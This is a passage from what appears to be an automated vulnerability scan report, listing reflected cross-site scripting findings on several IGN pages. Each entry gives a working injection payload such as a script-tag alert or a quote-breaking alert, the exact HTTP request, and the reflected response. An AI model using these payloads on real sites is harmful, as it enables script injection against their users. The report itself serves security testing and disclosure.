<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://corp.ign.com/properties/ign.html?70a21"><script>alert(1)</script>57433fb9041=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.143. http://corp.ign.com/user-agreement.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /user-agreement.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33d36"><script>alert(1)</script>6b98d3a9224 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user-agreement.html?33d36"><script>alert(1)</script>6b98d3a9224=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:40 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-18145-315965756-6;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:40 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041280459v-1n-12mc+1297041280459mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 45096

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>User Agreement - IGN Entertainment</title>
   <link rel="stylesheet" href="http:
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://corp.ign.com/user-agreement.html?33d36"><script>alert(1)</script>6b98d3a9224=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.144. http://corp.ign.com/user-agreement.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /user-agreement.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d792e"-alert(1)-"381dcd5e694 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /user-agreement.html?d792e"-alert(1)-"381dcd5e694=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:42 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-3558-333530059-7;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:42 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041282193v-1n-12mc+1297041282193mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 45066

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>User Agreement - IGN Entertainment</title>
   <link rel="stylesheet" href="http:
...[SNIP]...
eof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://corp.ign.com/user-agreement.html?d792e"-alert(1)-"381dcd5e694=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.145. http://ds.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f985c"-alert(1)-"350b28818c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?f985c"-alert(1)-"350b28818c2=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-26954-911003924-6;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:24 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041684454v-1n-12mc+1297041684454mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 156496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Nintendo DS - DS &
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/?f985c"-alert(1)-"350b28818c2=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.146. http://ds.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ccb3"><script>alert(1)</script>fd8eba6ee0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9ccb3"><script>alert(1)</script>fd8eba6ee0e=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-1825-1664550040-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:21 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041681499v-1n-12mc+1297041681499mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 156368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Nintendo DS - DS &
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/?9ccb3"><script>alert(1)</script>fd8eba6ee0e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.147. http://ds.ign.com/articles/114/1144790p1.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /articles/114/1144790p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2fee"><script>alert(1)</script>feb0c62afa1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/114/1144790p1.html?b2fee"><script>alert(1)</script>feb0c62afa1=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:47:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:47:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-25644-671870716-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:47:21 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043241081v-1n-12mc+1297043241081mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 114971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/articles/114/1144790p1.html?b2fee"><script>alert(1)</script>feb0c62afa1=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.148. http://ds.ign.com/articles/114/1144790p1.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /articles/114/1144790p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 615b0"-alert(1)-"70bd57fc703 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/114/1144790p1.html?615b0"-alert(1)-"70bd57fc703=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:47:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:47:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-13272-220840444-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:47:25 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043245808v-1n-12mc+1297043245808mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 114911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
omscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/articles/114/1144790p1.html?615b0"-alert(1)-"70bd57fc703=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.149. http://ds.ign.com/articles/114/1147000p1.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /articles/114/1147000p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf59c"><script>alert(1)</script>f12d6b81cd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/114/1147000p1.html?cf59c"><script>alert(1)</script>f12d6b81cd4=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:47:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:47:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-22919-1042351517-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:47:40 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043260130v-1n-12mc+1297043260130mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 124871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/articles/114/1147000p1.html?cf59c"><script>alert(1)</script>f12d6b81cd4=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.150. http://ds.ign.com/articles/114/1147000p1.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /articles/114/1147000p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1599"-alert(1)-"883c8f7eb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/114/1147000p1.html?b1599"-alert(1)-"883c8f7eb7=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:47:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:47:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-23512-1315046045-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:47:50 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043270743v-1n-12mc+1297043270743mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 124828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
omscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/articles/114/1147000p1.html?b1599"-alert(1)-"883c8f7eb7=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.151. http://ds.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/features.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a750a"><script>alert(1)</script>0b52f57593c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/features.html?a750a"><script>alert(1)</script>0b52f57593c=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c05-26779-1131264065-8;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:49 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041709653v-1n-12mc+1297041709653mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 145931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Nintendo DS & DSi
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/features.html?a750a"><script>alert(1)</script>0b52f57593c=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.152. http://ds.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/features.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a51fa"-alert(1)-"eea0e1cc2a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/features.html?a51fa"-alert(1)-"eea0e1cc2a2=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c02-24874-173225407-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:53 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041714006v-1n-12mc+1297041714006mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 146047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Nintendo DS & DSi
...[SNIP]...
ypeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/index/features.html?a51fa"-alert(1)-"eea0e1cc2a2=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.153. http://ds.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/games.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abbe6"-alert(1)-"60b113bb3a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/games.html?abbe6"-alert(1)-"60b113bb3a0=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-19323-261436646-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:53 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041713228v-1n-12mc+1297041713228mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 180122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>All Nintendo DS &
...[SNIP]...
f(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://ds.ign.com/index/games.html?abbe6"-alert(1)-"60b113bb3a0=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.154. http://ds.ign.com/index/games.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/games.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dd18"><script>alert(1)</script>8dcff63431b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/games.html?2dd18"><script>alert(1)</script>8dcff63431b=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c06-15003-1207569308-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:49 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041709658v-1n-12mc+1297041709658mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 179322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>All Nintendo DS &
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/games.html?2dd18"><script>alert(1)</script>8dcff63431b=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.155. http://ds.ign.com/index/images.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/images.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20e43"><script>alert(1)</script>9a1b0f2269e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/images.html?20e43"><script>alert(1)</script>9a1b0f2269e=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-3558-647456477-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:50 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041710784v-1n-12mc+1297041710784mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 116182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN DS: Games, Che
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://ds.ign.com/index/images.html?20e43"><script>alert(1)</script>9a1b0f2269e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.156. http://ds.ign.com/index/images.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.ign.com
Path:   /index/images.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84e66"-alert(1)-"8a875710ab2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/images.html?84e66"-alert(1)-"8a875710ab2=1 HTTP/1.1
Host: ds.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.9-78.0.22.ELsmp amd64 java/1.6.0_13
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:21:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:21:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-26296-1336603634-8;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:21:58 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041718598v-1n-12mc+1297041718598mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 118699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
